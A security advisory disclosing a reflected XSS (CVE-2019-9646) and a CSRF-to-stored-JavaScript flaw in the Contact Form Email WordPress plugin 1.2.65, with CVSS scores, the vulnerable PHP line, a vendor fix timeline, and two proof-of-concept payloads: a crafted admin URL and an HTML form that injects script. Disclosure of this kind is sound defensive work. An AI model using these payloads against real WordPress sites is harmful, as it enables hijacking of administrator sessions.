• Vulnerability: XSS & CSRF
  • Affected Software: Contact Form Email (30,000+ active installations)
  • Affected Version: 1.2.65
  • Patched Version: 1.2.66
  • CVE: CVE-2019-9646 (XSS)
  • Risk: Medium
  • Vendor Contacted: 10/31/2018
  • Vendor Fix: 10/31/2018
  • Public Disclosure: 02/05/2019

Reflected XSS

CVSS

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

The Contact Form Email WordPress plugin is vulnerable to reflected XSS as it echoes the item parameter without proper encoding.

Successful exploitation allows an attacker to execute JavaScript in the context of the application in the name of an attacked user. This in turn enables an attacker to bypass CSRF protection and thus perform any actions the legitimate user can perform, as well as read data which the user can access.

Proof of Concept
http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item='"><img+src%3Dx+onerror%3Dalert(1)>
Code
contact-form-to-email/cp_admin_int_edition.inc.php
<input name="cfwpp_edit" type="hidden" value="<?php echo $_GET["item"]; ?>" />

CSRF (to XSS)

CVSS

6.1 Medium CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Details

The plugin allows the addition of custom JavaScript to forms. Because the request to place this addition is not protected against CSRF, an attacker can place arbitrary JavaScript into the application if an authenticated user visits a webpage containing malicious HTML and/or JavaScript.

Proof of Concept
<html>
  <body>
    <form action="http://192.168.0.103/wordpress/wp-admin/admin.php?page=cp_contactformtoemail&edit=1&cal=1&item=js" method="POST">
      <input type="hidden" name="CP&#95;CFTE&#95;post&#95;edition" value="1" />
      <input type="hidden" name="cfwpp&#95;edit" value="js" />
      <input type="hidden" name="editionarea" value="alert(2);" />
      <input type="hidden" name="submit" value="Save&#32;Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
Timeline
  • 10/31/2018 Asked for email address via contact form
  • 10/31/2018 Vendor responds, advisory sent
  • 10/31/2018 Vendor releases fix
  • 02/05/2019 Disclosure